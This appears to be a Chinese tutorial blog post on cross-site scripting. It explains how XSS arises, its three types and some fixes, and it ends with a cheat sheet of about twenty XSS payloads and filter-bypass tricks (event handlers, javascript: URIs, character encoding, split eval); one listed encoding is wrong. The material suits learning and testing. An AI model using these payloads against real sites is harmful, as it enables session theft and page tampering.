XSS漏洞

最新推荐文章于 2025-11-24 17:47:29 发布
原创 最新推荐文章于 2025-11-24 17:47:29 发布 · 208 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #网络

文章介绍了XSS跨站脚本攻击的原理,指出了由于系统对用户输入过滤不足,允许恶意脚本执行。提出了修复措施,包括字符转义和使用HTTPOnly。同时详细列举了不同类型的XSS,如DOM型、反射型和存储型,并展示了多种常见的payload及其绕过方法。

一、介绍

XSS又叫CSS(Cross Site Script),跨站脚本攻击。因与html中的css样式重名,所以称之为XSS。

二、原理

系统对用户的输入过滤不严,导致用户可以输入恶意的脚本代码,如js,并且能够被浏览器执行,而达到攻击者的目的。

三、修复方式

1、对实体字符进行转义
在这里插入图片描述
2、使用HTTP Only来禁止JavaScript读取cookie值

3、输入时校验、浏览器与Web应用端采用相同的字符编码

四、分类

1、DOM型:修改HTML DOM节点,俗称自己玩自己
2、反射型:也叫非持久性,只能执行一次,再次执行的话,需要重新输入
3、存储型:也叫持久性,存储到数据库中

五、发现

1、找输入:寻找用户可以输入的位置
2、找输出:寻找输入内容显示的位置
3、构造payload

六、常见payload及绕过

//1
<script>alert(1)</script>

//2
<script>location="https://www.baidu.com"</script>

//3
<script>alert(document.cookie)</script>

//4
<img src=1 onerror=alert(1)>

//5
<a href="javascript:alert(1)">aa</a>

//6
<input name="keyword" value=""oninput="alert(1)">

//7
<input name="keyword" value=""onclick="alert(1)">

//8  对script关键字进行编码
<a href="java&#115;&#99;&#114;&#105;&#112;&#116;:alert(1)">aa</a>

//9
<script>confirm(1)</script>

//10
<script>prompt(1)</script>

//12 事件驱动
<img src='./11.jpg' onmouseover='alert(1)'> 
<input type="text" onkeydown="alert(1)">
<input type="text" onkeyup="alert(1)">
.......

//13
<svg onload="alert(1)"> //svg是h5的标签,onload也是事件,提交即触发

//14
<input onfocus=alert(1) autofocus> //onfucus为事件,聚焦(当光标放到目标)即触发

//15 大小写混编
html对大小写不敏感,js对大小写敏感

//16  [/]代替空格
<a/href="javascript:alert(1)">111</a>

//17 在一些关键字内插入回车符与tab符,绕过关键字检测
<img src	='#' onerror='alert(1)'>
<a href="ja	va
script:alert(1)">111</a>  //ja tab符 va...

//18 编码绕过
可以对标签属性值进行转码,来实现绕过,转码后要加分号
字符a,的ascii码97,十进制编码&#97; , 十六进制编码&#x61
字符e,的ascii码101,十进制编码&3101 , 十六进制编码&#x65

tab ==> &#9;
换行 ==> &#10;
回车 ==> &#13;

<a href="j&#97;v&#x61;script:alert(1)">11</a> //经过简单编码
<A href="&#01;j&#97;v&#x61;s&#9;c&#10;r&#13;ipt:alert(1)">11</a> //经过插入字符

//19 拆分跨站
<script>z='alert'</script>
<script>z=z+'(1)'</script>
<script>eval(z)</script>
//将语句拆分成多个,拼接起来后执行。若后台对字符串长度做限制,则可用拆分跨站将一个较长的shellcode拆成几部分。

//20 css变形

//21
<a href="#" onClick="return confirm(1)">11</a>

//22
<a href="javascript:top['al\145rt']`1`">11</a>
XSS漏洞总结
2201_75899444的博客
07-20 1200
跨站脚本攻击(Cross-Site Scripting,XSS)是一种常见的网络安全漏洞攻击者通过在网页上注入恶意脚本代码,从而在用户的浏览器上执行恶意操作。这些脚本可以是 JavaScript、HTML 或其他网页脚本语言。窃取用户信息:攻击者可以利用 XSS 漏洞窃取用户的敏感信息,如用户会话 cookie、登录凭证等。会话劫持:通过获取用户的会话信息,攻击者可以冒充合法用户,执行未授权的操作。网页篡改:攻击者可以修改网页内容,显示虚假信息,诱导用户点击恶意链接或下载恶意文件。
XSS漏洞原理
2302_81945070的博客
07-22 966
跨站脚本攻击(Cross-Site Scripting,简称XSS)是一种常见的Web安全漏洞,指攻击者通过在网页中注入恶意脚本代码,当用户浏览该网页时,脚本代码被浏览器执行,从而达到窃取用户信息、劫持用户会话、篡改网页内容等攻击目的。与SQL注入等直接攻击服务器的漏洞不同,XSS主要利用浏览器对用户输入的信任,将恶意代码注入到网页中,针对客户端用户进行攻击
xss漏洞
lsswyy的博客
03-02 1105
stealCookie()
XSS漏洞修复
一个热衷于网络安全的技术宅,这里记录我的学习轨迹、漏洞分析、CTF复盘和一些偏门技巧。 偶尔翻翻协议,常常调调漏洞,目标是在0和1之间找到属于自己的战斗力。
05-27 752
XSS(跨站脚本攻击)是一种常见的 Web 安全漏洞攻击者通过向网页注入恶意脚本,利用浏览器的漏洞在用户端执行恶意操作。XSS 漏洞主要有三种类型:反射型 XSS、存储型 XSS 和 DOM 型 XSS。反射型 XSS 通过恶意链接诱使用户点击,立即执行脚本;存储型 XSS 将恶意脚本存储在服务器中,导致后续访问的用户都被攻击;DOM 型 XSS 通过修改客户端的 DOM 来执行恶意脚本。XSS 漏洞的危害包括窃取用户信息(如 Cookie)、进行钓鱼攻击、篡改页面内容以及攻击管理员。
XSS漏洞利用
2302_79885863的博客
04-01 2822
输出编码主要有URL、HTML、JS可以采用白名单验证或者黑名单验证方法。白名单验证:对用户提交的数据进行格查,只接受指定长度范围内、采用适当格式和预期字符的输入,其余一律过滤黑名单验证:对包含XSS代码特征的内容进行过滤,如"“、“script”、”#"等·对所有输出字符进行HTML编码‘’ 转成& gt;‘&’ 转成& amp;" 转成& quot;’ 转成& #39;
XSS漏洞学习
m0_63017297的博客
06-17 1572
定义:XSS(Cross Site Scripting)攻击全称跨站脚本攻击,是为不和层叠样式表 (Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。成因:XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植 入到提供给其它用户使用的页面中,而程序对输入和输出的控制不够严格,导致“精心构造” 的脚本输入后,再输到前端时被浏览器当作有效代码解析执行从而产生危害。当受害者访问 这些页面时,浏览器会解析并执行这些恶意代码。
XSS漏洞实验
goldfish8848的博客
06-23 2261
本篇为xss漏洞实验练习,练习网址来源于网络
DedeCMS 存储型xss漏洞1
08-03
【DedeCMS 存储型 XSS 漏洞1】详解 DedeCMS 是一款广泛使用的基于PHP的开源网站管理系统,其特色在于提供了一个简洁易用的后台管理界面,帮助企业或个人快速构建网站。然而,如同任何软件一样,DedeCMS 也存在安全...
人工智能时代:以备案制度筑牢安全防线
最新发布
qq_58995858的博客
11-24 270
人工智能技术快速发展带来安全隐患,如自动驾驶事故、算法歧视等问题凸显。国家出台备案制度,要求AI产品提交技术资料和数据样本,增强透明度。该制度通过算法可解释性、公平性评估等机制,有效降低技术风险,提升用户信任。备案不仅是合规要求,更是构建数字时代信任基石的关键举措,将推动AI行业健康有序发展。
汽车被动安全约束系统(PSCS)功能介绍
liuxu324的博客
11-20 515
本文主要对汽车被动安全约束系统(PSCS)相关知识进行介绍和总结,以加深理解,及方便后续查阅。
云原生安全
2509_93947362的博客
11-24 255
先聊聊容器安全这块硬骨头。另外,容器运行时也得盯紧,像Falco这种开源工具能实时监测异常操作,比如突然冒出的特权容器或者敏感目录访问,一有风吹草动就告警。云平台的原生安全工具也得用起来,比如AWS的Security Group和Azure的NSG,规则要最小权限原则,只开放必要端口。说实话,刚开始推行时总有人抱怨流程繁琐,等真防住几次零日漏洞攻击后,全员才意识到:云原生安全就是个持续博弈的过程,今天偷懒省一步,明天就可能全线崩盘。总之,云原生安全没有银弹,它得像编织渔网一样,把技术、流程、文化三层织密。
【2025-11-23】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
jenchoi413的博客
11-24 333
2025年11月23日共发布14条漏洞预警,包括11条CVE漏洞和3条供应链投毒预警。CVE漏洞涉及Ashraf Kabir旅行社系统(5.3-5.1中危)、D-Link路由器(7.4高危)和Campcodes管理系统(6.9中危),主要风险为SQL注入和缓冲区溢出。供应链投毒预警包括PyPI的nspacercesolve组件窃取敏感信息、NPM的ddos-hunter组件勒索行为以及session-keeper等组件内嵌后门,影响多个版本。建议用户及时排查相关组件,高危漏洞需优先修复。
【2025-11-19】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
jenchoi413的博客
11-21 536
2025年11月19日新增91条漏洞预警,其中商业软件漏洞63条,供应链投毒28条。重点漏洞包括:Eclipse Jersey竞争条件漏洞(9.4分高危),可能导致SSL配置失效;Fortinet系列产品多漏洞,其中FortiVoice存在SQL注入(8.8分高危),FortiWeb存在命令注入(7.2分高危);Checkmk监控平台存在权限验证不足问题(5.3分中危)。建议优先修复Eclipse Jersey和Fortinet产品的高危漏洞,其他中低危漏洞可根据实际情况选择修复。
VR机动车驾驶系统——驶入虚拟,握紧安全
xhyyvr的博客
11-21 1461
VR 机动车驾驶模拟系统依托虚拟现实技术,核心是让用户在安全仿真环境中,既体验逼真驾驶感,又系统学习交通安全知识。它通过 “沉浸式体验 + 案例警示”,让用户直面危险驾驶后果。
防止 iOS 应用被二次打包,从完整性校验到 IPA 成品混淆的多层安全方案
2501_91592143的博客
11-24 816
本文介绍防止 iOS 应用被二次打包的完整方案:通过 MobSF/class-dump 分析风险,Ipa Guard CLI 混淆 IPA 并扰动资源(图片 MD5、JS/H5 路径),kxsign 重签验证,Frida/Hopper 逆向测试,再结合完整性校验与 KMS 管理映射表,构建可回滚的多层防护体系。
XSS 漏洞
09-02
### 定义 XSS(Cross-Site Scripting)即跨站脚本攻击,是一种常见的 Web 安全漏洞攻击者通过在目标网站注入恶意脚本,当其他用户访问该网站时,恶意脚本会在用户的浏览器中执行,从而窃取用户信息或进行其他恶意操作[^1]。 ### 原理 - **反射型**:攻击者构造包含恶意脚本的 URL,诱导用户点击,服务器接收到请求后将恶意脚本反射到响应中,浏览器解析并执行该脚本。 - **存储型**:攻击者提交一段 XSS 代码后,服务器接收并存储,当其他用户访问包含该 XSS 代码的页面时,XSS 代码被浏览器解析并执行。允许用户存储数据到服务器端的 Web 应用程序可能存在该类型 XSS 漏洞[^2]。 - **DOM 型**:基于 DOM(文档对象模型)的操作,通过修改页面的 DOM 结构来注入恶意脚本,不涉及服务器端数据的存储和反射。 ### 检测 - **常见 POC**:POC(Proof of Concept)即概念验证,常指一段漏洞证明的代码。例如,在反射型 XSS 检测中,可以构造包含简单 JavaScript 代码的 URL,如 `http://example.com/search?keyword=<script>alert('XSS')</script>`,如果页面弹出提示框,则说明可能存在反射型 XSS 漏洞[^3]。 - **自动化工具**:使用专业的安全检测工具,如 OWASP ZAP、Burp Suite 等,这些工具可以自动扫描网站,检测潜在的 XSS 漏洞。 ### 修复 - **输入过滤**:对用户输入进行严格的过滤,只允许合法的字符和格式。例如,使用正则表达式过滤特殊字符,防止恶意脚本注入。 - **输出编码**:在将用户输入输出到页面时,进行 HTML 实体编码,将特殊字符转换为 HTML 实体,防止浏览器将其解析为脚本。例如,将 `<` 转换为 `<`,`>` 转换为 `>`。 ```java import org.owasp.esapi.ESAPI; public class XSSUtils { public static String encodeForHTML(String input) { return ESAPI.encoder().encodeForHTML(input); } } ``` - **标签黑白名单过滤**:设置标签黑白名单,只允许或禁止特定的 HTML 标签和属性。例如,只允许 `<b>`、`<i>` 等简单标签,禁止 `<script>` 标签。 - **HttpOnly 属性**:对于存储用户敏感信息的 Cookie,设置 HttpOnly 属性,防止 JavaScript 脚本通过 `document.cookie` 窃取 Cookie 信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值